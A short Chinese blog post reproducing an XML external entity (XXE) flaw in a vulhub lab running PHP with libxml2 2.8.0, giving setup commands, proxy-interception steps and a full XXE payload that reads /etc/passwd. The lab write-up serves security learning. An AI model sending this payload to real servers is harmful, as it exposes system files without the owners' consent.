PHP环境 XML外部实体注入漏洞

小黑Neo

 关注

阅读 95

2022-03-12

漏洞描述

libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。为了演示PHP环境下的XXE漏洞,本例会将libxml2.8.0版本编译进PHP中。PHP版本并不影响XXE利用。

影响范围

libxml2.8.0版本

复现过程

使用vulhub

cd /vulhub/php/php_xxe 进入目录

 docker-compose up -d 启动

访问

抓包,刷新一下页面就行

发送到repeater

进行修改

在最后增加上这个代码

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE xxe [

<!ELEMENT name ANY >

<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>

<root>

<name>&xxe;</name>

</root>

这样就获取到passwd的值了

相关推荐

(vulhub)PHP环境XML外部实体注入漏洞(XXE)

爱做梦的老巫婆 76 0 0

xxe漏洞--xml外部实体注入漏洞

ivy吖 16 0 0

Pikachu漏洞靶场 XXE(xml外部实体注入漏洞)

秀妮_5519 74 0 0

XXE—XML外部实体注入

Soy丶sauce 101 0 0

XML外部实体注入攻击XXE

J简文 35 0 0

No.18 笔记 | XXE(XML 外部实体注入)漏洞原理、分类、利用及防御整理

佛贝鲁先生 12 0 0

XML&XXE实体注入

君心浅语 17 0 0

vulhub中Apache solr XML 实体注入漏洞复现(CVE-2017-12629)

仲秋花似锦 13 0 0

OWASP TOP 10-XML外部实体(XXE)

洒在心头的阳光 47 0 0

web安全渗透测试十大常规项(一):web渗透测试之XML和XXE外部实体注入

巧乐兹_d41f 11 0 0

精彩评论(0)

0 0 举报